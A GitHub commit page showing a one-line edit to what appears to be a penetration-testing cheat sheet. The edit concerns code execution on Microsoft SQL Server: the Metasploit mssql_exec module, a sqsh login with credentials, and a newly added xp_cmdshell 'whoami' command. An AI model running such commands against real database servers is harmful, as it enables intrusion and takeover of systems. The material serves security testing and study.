Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-04-29 06:51:56 +05:00 committed by GitHub
parent 1a21bdf555
commit 688c7cc4ce
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -371,7 +371,7 @@ Edit the port if you want to by default the `SRVPORT` is set to 1080 , you can e
### MSSQL Code Execution
Using `use admin/mssql/mssql_exec` we can execute code by specifying the credentials<br />
Using `sqsh -S IP -U <username> -P <password>`
Using `sqsh -S IP -U <username> -P <password>` then `EXEC master ..xp_cmdshell 'whoami' `
# Git